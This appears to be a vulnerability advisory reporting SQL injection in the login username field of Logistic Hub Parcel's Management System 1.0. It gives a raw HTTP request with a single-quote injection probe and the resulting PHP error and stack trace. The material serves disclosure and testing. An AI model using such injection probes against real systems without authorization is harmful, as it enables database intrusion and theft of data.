Simple-Logistic-Hub-Parcels-Management
Vendor
Description:
The username parameter appears to be vulnerable to SQL injection attacks on Logistic Hub Parcel's Management System 1.0 by (oretnom23). A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
[+] Exploit Source:
- MySQL Request:
POST /lhpms/Actions.php?a=login HTTP/1.1
Host: 192.168.1.215
Origin: http://192.168.1.215
Cookie: PHPSESSID=noe1h727o1k1ge3mfchl5mlgje
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.215/lhpms/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37
username=WCIetKyr'&password=p1H!z1u!W2- MySQL Response:
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2021 12:51:25 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 294
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\lhpms\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\lhpms\Actions.php(416): Actions->login()
#1 {main}
thrown in <b>
...[SNIP]...
